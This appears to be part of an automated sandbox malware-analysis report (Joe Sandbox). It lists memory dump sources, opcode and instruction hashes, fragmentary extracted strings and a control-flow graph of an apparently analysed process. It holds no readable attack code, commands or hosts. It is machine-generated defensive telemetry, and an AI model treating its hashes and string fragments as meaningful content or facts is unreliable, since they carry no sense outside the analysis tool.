                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1722540fd88b55166798848b9a1409342e480558689cd18c621267c4a9afc99e
                              • Instruction ID: 7e28bef5b20b4eab1965361a147f76929d3cf3a833edb61135542a0c4c12d16a
                              • Opcode Fuzzy Hash: 1722540fd88b55166798848b9a1409342e480558689cd18c621267c4a9afc99e
                              • Instruction Fuzzy Hash: F6122221A0E7CA4FE767973848355B87FA1AF26310B0A01EBD089CB1F7ED19AC45C342
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6f8df31993b4cf437070e2f09319f153cb3ce2348259eb0d5a9253dda60f0e4a
                              • Instruction ID: 61664ce36f8e405a2a0b0413cf361cb03806b52deb476e364025bf83f0564409
                              • Opcode Fuzzy Hash: 6f8df31993b4cf437070e2f09319f153cb3ce2348259eb0d5a9253dda60f0e4a
                              • Instruction Fuzzy Hash: 3002E330B09A4E8FDB99DF68C860AA977E1FF99310B1501ADD41DC72E6CE75E942CB40
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6df8bb105a4148dae374f5362019946d7a46b02afa1901dc633efe0bb4e498b7
                              • Instruction ID: 2d15dec6d2b771964d08fa6e09dea2d57e2c9b1a88759c28c265e988496e9261
                              • Opcode Fuzzy Hash: 6df8bb105a4148dae374f5362019946d7a46b02afa1901dc633efe0bb4e498b7
                              • Instruction Fuzzy Hash: 7AD13521B0EA494FE7A9DB7884B16B977D1EF85314F0502BDD08EC72E2DE28B9428741
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dbec0c6fa9c65c95b0f22e2f2d80c85986f5a369bcfce5f83f5aba87eebbc5fe
                              • Instruction ID: 371a539127ac5f7aa6763141f757b40ca70d3e864826d14020050467626fed84
                              • Opcode Fuzzy Hash: dbec0c6fa9c65c95b0f22e2f2d80c85986f5a369bcfce5f83f5aba87eebbc5fe
                              • Instruction Fuzzy Hash: B7C12671A1E38A8FE3798B7484555B87BD0EF46310F0586BED48E8B1B6EF285507CB41
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 180ffda26e44179d53bb0830c5f00b9a74d6e6e40966e9ad1837047a3a0de190
                              • Instruction ID: 26fb58fc0c8a0d4e34fce8ed7e7b494608db90610a4c2866e42766c4c3c9ef3c
                              • Opcode Fuzzy Hash: 180ffda26e44179d53bb0830c5f00b9a74d6e6e40966e9ad1837047a3a0de190
                              • Instruction Fuzzy Hash: 2AA14831B0EA4A8FD76DDB7C94665B837D2FFA9321B0141BED00ACB2E2DD695C028740
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8caf7c58c934ae2ebde3baf72f00e1d9f36af4913581ca76de3640f390b77b4d
                              • Instruction ID: a9970a8868c25ba220bfe878e036429f374842f29fa4989d75ae775b89e4bc4b
                              • Opcode Fuzzy Hash: 8caf7c58c934ae2ebde3baf72f00e1d9f36af4913581ca76de3640f390b77b4d
                              • Instruction Fuzzy Hash: 88910431F0995D4BE768DBBC88657BC7BE2EF98310F05417AD00DE7296DE286D428781

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 7"q$ 8"q$(7"q$(8"q$07"q$08"q$87"q$88"q$@7"q$@8"q$H7"q$H8"q$P7"q$P8"q$X7"q$X8"q$`7"q$`8"q$h7"q$p7"q$x7"q$7"q$7"q
                              • API String ID: 0-600004247
                              • Opcode ID: 192271dd87c156f0786f46c52026478ae4bee9a327555d3f629e5045abfb0c6a
                              • Instruction ID: 222f6a349f65e3ce72d58c94952604a2fe25386b2248e3958afa93a6e70b4754
                              • Opcode Fuzzy Hash: 192271dd87c156f0786f46c52026478ae4bee9a327555d3f629e5045abfb0c6a
                              • Instruction Fuzzy Hash: CA02B76060EBDE6FD72997B848239DEBFE0AF06365B2546FDE0459B0E3D89C1806C711

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ["q$ ["q$ ["q$ ["q$ ["q$ ["q$ ["q$ ["q$ ["q$ ["q$(["q$0["q$8["q$@["q$H["q$P["q$X["q$`["q$h["q$p["q
                              • API String ID: 0-1938359724
                              • Opcode ID: 64ac23ac81e835a5025da50f0e0dc5c4af297e5313f8351c65f27c939b97603a
                              • Instruction ID: 9ffbbd491a505727bacd31cd8b645f7c40c0ecead23a1da81ed76d7c1eebe272
                              • Opcode Fuzzy Hash: 64ac23ac81e835a5025da50f0e0dc5c4af297e5313f8351c65f27c939b97603a
                              • Instruction Fuzzy Hash: FA523A21B0EE8E0FE7A9EB7884256E93BD1EF86360B050AFED059C71E7DD685D018301

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ["q$ ["q$ ["q$ ["q$ ["q$ ["q$ ["q$["q/$q
                              • API String ID: 0-2227984164
                              • Opcode ID: 078c2f3437c05e6153318b6de822dc4507c036337701e5f9d8c4e0dc8adca487
                              • Instruction ID: a879d1e35043ac6407433e67f97614f3ac1294412a6f6d78cf98bbef9286b165
                              • Opcode Fuzzy Hash: 078c2f3437c05e6153318b6de822dc4507c036337701e5f9d8c4e0dc8adca487
                              • Instruction Fuzzy Hash: 6FF15E61A0FACA4FE7A5977844292E97BE1FF96374B0546FED0898B0E7E96C5C05C300

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ["q$ ["q$ ["q$ ["q$ ["q$ \"q$H$H
                              • API String ID: 0-1027688036
                              • Opcode ID: 0393ce71753e58dcb165817b96d05cb4d8a150e3efad23eccc3411d31f9f0c7b
                              • Instruction ID: 9fc3223bbe4ecfd40a23b0fcd4499e221442d88cd910afd61e7ec12a87b1c605
                              • Opcode Fuzzy Hash: 0393ce71753e58dcb165817b96d05cb4d8a150e3efad23eccc3411d31f9f0c7b
                              • Instruction Fuzzy Hash: 31A28E30719A4E8FDB88EF58C895BE973E1FF98314F1446B9E419C729ACA34E841CB40

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: Z"q$Z"q$Z"q$Z"q$Z"q$Z"q$Z"q$Z"q
                              • API String ID: 0-1372621
                              • Opcode ID: 0b62a871d07236d64ccd888831708b3a2a238651f7678d85795f4f914b394c75
                              • Instruction ID: 4c0db4eb5b633eff1d175abb938c75c28bc3a1c0c7da0bc8f767f748a1da81c7
                              • Opcode Fuzzy Hash: 0b62a871d07236d64ccd888831708b3a2a238651f7678d85795f4f914b394c75
                              • Instruction Fuzzy Hash: E951C630219B9E8FC317DBA4C4A69D9BBE0FF05310F4649FAC44ACB173E6686985C752

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2618 7ffd9bad9c65-7ffd9bad9c98 2621 7ffd9bad9c9a-7ffd9bad9cd4 2618->2621 2622 7ffd9bad9cf5-7ffd9bad9d4e 2618->2622 2629 7ffd9bad9cda-7ffd9bad9cf3 2621->2629 2630 7ffd9bada6a4-7ffd9bada6a9 call 7ffd9bad8600 2621->2630 2635 7ffd9bad9d4f-7ffd9bad9d69 2622->2635 2629->2622 2630->2635 2637 7ffd9bada6ae call 7ffd9bad8630 2635->2637 2638 7ffd9bad9d6f-7ffd9bad9dfe 2635->2638 2641 7ffd9bada6b3 2637->2641 2643 7ffd9bada6b8 call 7ffd9bad8660 2638->2643 2650 7ffd9bad9e04-7ffd9bad9e43 2638->2650 2641->2643 2646 7ffd9bada6bd 2643->2646 2646->2646 2650->2630
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ["q$ ["q$ ["q$ ["q$["q
                              • API String ID: 0-2962447644
                              • Opcode ID: b1d8a37fd90f70db95a29cde3717466236646c1824aa116d2765be70e693e053
                              • Instruction ID: 7123e01a2dccf11658b5d932dc61145a69bb3e6f54d2207191270b19088072c9
                              • Opcode Fuzzy Hash: b1d8a37fd90f70db95a29cde3717466236646c1824aa116d2765be70e693e053
                              • Instruction Fuzzy Hash: 8A612861A0FBCB0FE3AAD77444252E97BE0AF86364B0545FED0898B0E7EDAC5D058301
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ["q$ ["q$ ["q$["q
                              • API String ID: 0-1167017441
                              • Opcode ID: 34ebc949d5ab1233d9f7db43e550b1bfcb8279fb90069d760e918d9aa07157e1
                              • Instruction ID: ba557884d5318a6caefbb17bf75ee1c92ffa1bb9181add983bfeae7986fd2e5b
                              • Opcode Fuzzy Hash: 34ebc949d5ab1233d9f7db43e550b1bfcb8279fb90069d760e918d9aa07157e1
                              • Instruction Fuzzy Hash: 90716B72A0F7CA4FE369D77444291E57FE1AF86264B0A46FED0898B0F7E9985C06C700
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ["q$p["q$x["q
                              • API String ID: 0-1705836491
                              • Opcode ID: a7a0ef4fa6805629eee28908a43fcf56476d17ac60b74773074d9bc1d03a9673
                              • Instruction ID: 36f9fcd4b8e87b192890f36ae70e5fa046a71873808b66fcef7a4cdd0b758d5f
                              • Opcode Fuzzy Hash: a7a0ef4fa6805629eee28908a43fcf56476d17ac60b74773074d9bc1d03a9673
                              • Instruction Fuzzy Hash: 73214BA1A0FACA0FD3A9D73804291E53FE1AF8627470546FED049CB1E7ED685C058300
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: aK_H
                              • API String ID: 0-2603984226
                              • Opcode ID: 10e557737795d49ccc6225f0b995229f5d38c461061d085523261440e36af2c0
                              • Instruction ID: ea99ab280df506fef16583cd777a16d02ef933722b3394850d89c2ae98acdf1a
                              • Opcode Fuzzy Hash: 10e557737795d49ccc6225f0b995229f5d38c461061d085523261440e36af2c0
                              • Instruction Fuzzy Hash: A3138130709A4E8FDBD5EF6884A9BA973E1FF98310F1445B9D45DC72A6DE789842CB00
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: x6"q$x6"q
                              • API String ID: 0-1276134999
                              • Opcode ID: a61c91070be2fdaa611e7bcc83c532594951674844537e965058a823a9d259b9
                              • Instruction ID: 74d2c53b2df428b078e4fd7c197b713c8839f67c6e61b7dbd42b6f642caa21f3
                              • Opcode Fuzzy Hash: a61c91070be2fdaa611e7bcc83c532594951674844537e965058a823a9d259b9
                              • Instruction Fuzzy Hash: 46F16A20F0E65A4FE7789BA864651B977C1EF86330F15407ED08FC71EBDD6D69468202
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: Xa"q$`a"q
                              • API String ID: 0-1834776942
                              • Opcode ID: 80b7781ba57c4786d9b7ce7727887d0a9f7fcc8f39b33f3e654c701f12323003
                              • Instruction ID: be7f3f5965f454f1e76dface5f54e2399a9be4f9258c928cbc5b7c27cd5c59d8
                              • Opcode Fuzzy Hash: 80b7781ba57c4786d9b7ce7727887d0a9f7fcc8f39b33f3e654c701f12323003
                              • Instruction Fuzzy Hash: FFB14A32A0E68D0FE766A77898655F97BE0EF46314F0901FBD458CB0E3ED6C650A8741
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: @c"q$yR_H
                              • API String ID: 0-4140388885
                              • Opcode ID: 8bfd31acc78fce4d19cc429ee19f7af8e9a8318ba8a37020f659bb1394e6dc5e
                              • Instruction ID: f09ed7b6e3ad57c7c2b730eceb3a8e2eeef7123d64b3bbdc7a8edcce999455f2
                              • Opcode Fuzzy Hash: 8bfd31acc78fce4d19cc429ee19f7af8e9a8318ba8a37020f659bb1394e6dc5e
                              • Instruction Fuzzy Hash: C5A1E772F19A0D4FD764EB68D8556BDB3E1EFD9310F0102BAE44DC3296DE24AD428781
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: @c"q$yR_H
                              • API String ID: 0-4140388885
                              • Opcode ID: 74f2aee4266844e8fa08db2cc92f99f96d7b60b989544b573bb6a1fab19d413a
                              • Instruction ID: 807b96aa9fb11c10034596c6b5a8fe2a130e2d8bd8802a022fa5cc8ce00f8f0b
                              • Opcode Fuzzy Hash: 74f2aee4266844e8fa08db2cc92f99f96d7b60b989544b573bb6a1fab19d413a
                              • Instruction Fuzzy Hash: 7BA1E732F19A0D4FE764EB68D8556BDB3E1EFD9310F0103BAE44EC3296DE6469428781
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: X`"q$``"q
                              • API String ID: 0-2687767495
                              • Opcode ID: d51c158710fbffdab277487d923bce0078867c4b7e55c6f888e7451a8c173b2d
                              • Instruction ID: 42cdec08a2cb49d88f3029340e31fe30c528948b0c6470a23f99e13c153266f5
                              • Opcode Fuzzy Hash: d51c158710fbffdab277487d923bce0078867c4b7e55c6f888e7451a8c173b2d
                              • Instruction Fuzzy Hash: 40614C32A0E6CE0FE37197746C265E97FE1EF42321F0A01FAD498C70A3D99D160A8352
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: _"q$_"q
                              • API String ID: 0-3592793180
                              • Opcode ID: 1f7c1137068a362420863f1d4e35c67a22977e23f3ce5407dede57ddae134df1
                              • Instruction ID: a8e30cc7ee31f74751e964a03615f435556ddacc00fd4ca15f89b9e18e383a4b
                              • Opcode Fuzzy Hash: 1f7c1137068a362420863f1d4e35c67a22977e23f3ce5407dede57ddae134df1
                              • Instruction Fuzzy Hash: D7613C3160AA8E4FD796DF68C854AE977E1FF45310F1445FDE45ACB2A6CA78AC02C700
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 0c"q$8c"q
                              • API String ID: 0-3321867916
                              • Opcode ID: 8a6bde3358503507b1386b80898accd51518c1ff8e85ead02a381eafbba037f7
                              • Instruction ID: 64aca35b5a884010947f62f271664464887124f335221c1c4d9ac6d6a914d9be
                              • Opcode Fuzzy Hash: 8a6bde3358503507b1386b80898accd51518c1ff8e85ead02a381eafbba037f7
                              • Instruction Fuzzy Hash: DA11E72191EBC91FD32AA7744C2A5A57FD0DF57211F0A02FEE445C71E3EC996805C352
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8\"q$6"q
                              • API String ID: 0-2546099626
                              • Opcode ID: caf2b3cc6c06980c201a07165067f7bee73685c414cc654f00cc85f06e37833f
                              • Instruction ID: 821ad15d5e72b96394cf3472006917b6fc22362d7c22b43d08c944d8b8e9572d
                              • Opcode Fuzzy Hash: caf2b3cc6c06980c201a07165067f7bee73685c414cc654f00cc85f06e37833f
                              • Instruction Fuzzy Hash: 6221E721A4F7CA0FD362977848761A57FE0DF52220B0A05EFD445CB0E3E88C48868316
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ["q$q
                              • API String ID: 0-1884266385
                              • Opcode ID: 5730f910f44a1aa2159c2d395b72fa4ccd77c350da2e76a8f2434715098db00a
                              • Instruction ID: 665d6da2d2dd283e61db9acc6187f16f6e7dbe68ed30f7740db173963ace3107
                              • Opcode Fuzzy Hash: 5730f910f44a1aa2159c2d395b72fa4ccd77c350da2e76a8f2434715098db00a
                              • Instruction Fuzzy Hash: E8112962A0FADA4FD765D77444296E53FE1EF46260B0506EED0898B0F7E8985D46C300
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 0c"q$8c"q
                              • API String ID: 0-3321867916
                              • Opcode ID: 97a6271093324cb421781dfc5dce7be9553b0a453038d5500d3b0551e948bde9
                              • Instruction ID: 823d2b3de6c5d9091f3bed044542628245de508b8b314f3df7ef04b75b17fb0b
                              • Opcode Fuzzy Hash: 97a6271093324cb421781dfc5dce7be9553b0a453038d5500d3b0551e948bde9
                              • Instruction Fuzzy Hash: 9F016120A1DB4D2FE328A6794C2F5FA3AC5DF96610F0501BEE445C31D3EC996C078282
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8\"q$6"q
                              • API String ID: 0-2546099626
                              • Opcode ID: c3fd509ca93545ca28513dd70d52af553151264bb3ece3b8dbd7cc98f991bcce
                              • Instruction ID: 6cb3bafc082e0ff3968808fd530f62a25a622b5a7147925e2282fe7937cb54bd
                              • Opcode Fuzzy Hash: c3fd509ca93545ca28513dd70d52af553151264bb3ece3b8dbd7cc98f991bcce
                              • Instruction Fuzzy Hash: 6901A720B1EA5E1FE375A6B854661B97AD0DF45224F0649BEE809C71D2EC8948828345
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: x6"q
                              • API String ID: 0-798607815
                              • Opcode ID: 9f05d08cfb0e5458764481256515f3ea930da0b62c1744a250b3cb8520f3d983
                              • Instruction ID: b9e54e33a0aee3f970e69cd2889c885e296ec61d6964e2790f0483573ca4ed1c
                              • Opcode Fuzzy Hash: 9f05d08cfb0e5458764481256515f3ea930da0b62c1744a250b3cb8520f3d983
                              • Instruction Fuzzy Hash: F712472071D9494FEB6C9E1CE865AA933D1FF59304F1501BEE44ECB2E7CE24ED428685
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 4K_H
                              • API String ID: 0-1743149810
                              • Opcode ID: 33b8aff2d8b0c419cb16b14029e944b4e0abfc205a159646c7b15f4d23b54f31
                              • Instruction ID: 7d4f7c51ec4aeebe7d91d4214d44bef998c8212d1a92ce37d861bb69b3492350
                              • Opcode Fuzzy Hash: 33b8aff2d8b0c419cb16b14029e944b4e0abfc205a159646c7b15f4d23b54f31
                              • Instruction Fuzzy Hash: 19227430719A4E8FDBA8EF58C4A5AA973E2FF98304F514569E41DC7296CB35EC42CB40
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: d
                              • API String ID: 0-2564639436
                              • Opcode ID: 201ed91e8c6b4b2b21dbe9d6d88e9c1180d6bdc0c1cfe57dc1c034dc81035791
                              • Instruction ID: 8c23b5d4d6d1bb7c89664b1a083e3d2d7100380b0333ec92c33c5a6fb9e7100c
                              • Opcode Fuzzy Hash: 201ed91e8c6b4b2b21dbe9d6d88e9c1180d6bdc0c1cfe57dc1c034dc81035791
                              • Instruction Fuzzy Hash: 5BD19230618B098FD768DF18D4A5AB5B3E1FF94314F10497DD09EC76A6DA35B882CB81
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: H
                              • API String ID: 0-2852464175
                              • Opcode ID: c0acbb0525caba1999288867097a52313887e472d93e8bb7fcd7777089990d71
                              • Instruction ID: 364d76bf696508bc75c79fd5624c3a7ce8c57c6be5acab41a998ff4d18cb5444
                              • Opcode Fuzzy Hash: c0acbb0525caba1999288867097a52313887e472d93e8bb7fcd7777089990d71
                              • Instruction Fuzzy Hash: E7F18531618A4E8FDF88EF58C894AEA73B1FF94304F544679E41AC72D6DE35A942CB40
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 6"q
                              • API String ID: 0-2332663774
                              • Opcode ID: c5d994d64920875f43912c111faa3c56fd7e30d9f6508692421295b71ebe3ee9
                              • Instruction ID: fde61fd042626ac3279405de8375033f68a4c6a53e7210cb4183f0394c567b8c
                              • Opcode Fuzzy Hash: c5d994d64920875f43912c111faa3c56fd7e30d9f6508692421295b71ebe3ee9
                              • Instruction Fuzzy Hash: BEC13731B0D68E4FEBA4DB6888652B97BE1FF99310F05067ED05DC71E2CE689906C741
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: Pc"q
                              • API String ID: 0-543728205
                              • Opcode ID: fe41e7ada841699d77081133ac063f1a5217245e4acb0745958b3f2a69a34b0a
                              • Instruction ID: 2213093197b556f18274e8af8b6233026a1d56570c26961878c08d5c30876289
                              • Opcode Fuzzy Hash: fe41e7ada841699d77081133ac063f1a5217245e4acb0745958b3f2a69a34b0a
                              • Instruction Fuzzy Hash: C981D332A0CA4D4FD7A8DBACD455AB9B7E1EFD8311F05437ED04EC32A5DE64A8028781
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: `"q
                              • API String ID: 0-1225899144
                              • Opcode ID: 5cf2d26bc8c2512e09c38a9a05a7f1c6b4ccd21dfa8d7c71c445347589a38f77
                              • Instruction ID: 266b58a8ac55f73f48eb40ac18466f1683f37bf0b10892a217449cc7770576d1
                              • Opcode Fuzzy Hash: 5cf2d26bc8c2512e09c38a9a05a7f1c6b4ccd21dfa8d7c71c445347589a38f77
                              • Instruction Fuzzy Hash: E1810632A0E6CD1FE76397B448655F97FE0EF46320F0A05FAD488CB0A3D95D5A1A8742
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: a"q
